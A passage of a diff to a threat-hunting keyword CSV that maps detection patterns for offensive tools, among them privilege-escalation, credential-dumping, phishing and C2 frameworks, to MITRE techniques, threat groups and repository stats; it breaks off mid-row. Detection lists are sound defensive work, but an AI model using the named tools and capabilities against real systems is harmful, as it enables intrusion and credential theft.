 "*beRoot.exe*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z"
 "*beroot.py -*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z"
@@ -7751,25 +7897,25 @@
 "*berzerk0*","offensive_tool_keyword","Github Username","github username known for repos on passwords exploitation and offensive tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/berzerk0","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*BesoToken.exe list*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z"
 "*BesoToken-master*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z"
-"*best*phish her*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z"
-"*bestcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*bestcryptve2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*best*phish her*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z"
+"*bestcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*bestcryptve2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*BetterBackdoor*","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","3","275","89","2022-10-03T21:30:21Z","2019-07-29T14:45:24Z"
-"*bettercap *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*bettercap *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
 "*bettercap -iface eth0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*bettercap.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
-"*bettercap_.deb*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
-"*bettercap-master.zip*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*bettercap.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*bettercap_.deb*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*bettercap-master.zip*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
 "*betterdefaultpasslist*","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","6","585","151","2021-03-11T11:32:17Z","2016-09-24T16:21:44Z"
-"*BetterSafetyKatz.*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*BetterSafetyKatz.*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
 "*bgetprivs*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
 "*bhashdump*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
-"*bhd_enum_dconly*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*bhd_enum_dconly*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*bhttp_x64.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bigb0sss/goPassGen*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*bin/*/PS2EXE/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*bin/addusertogroup.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*bin/addusertogroup.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*bin/bof_c.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/bof_nim.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files 
with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/dll/merlin.c*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" 
@@ -7777,9 +7923,9 @@
 "*bin/ldd2pretty*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z"
 "*bin/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
 "*bin/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
-"*bin/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z"
-"*bin/setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z"
-"*bin/setuserpass.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*bin/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z"
+"*bin/setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z"
+"*bin/setuserpass.x64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*bin/SillyRAT/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*bin/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z"
 "*bin/void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
@@ -7789,33 +7935,34 @@ "*bin\void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*binderlabs/DirCreate2System*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*binwalk -e image.png*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*BishopFox/sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*bitb_server/phishing.ini*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & 
Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" -"*bitcoin2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Bitmap-Elevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
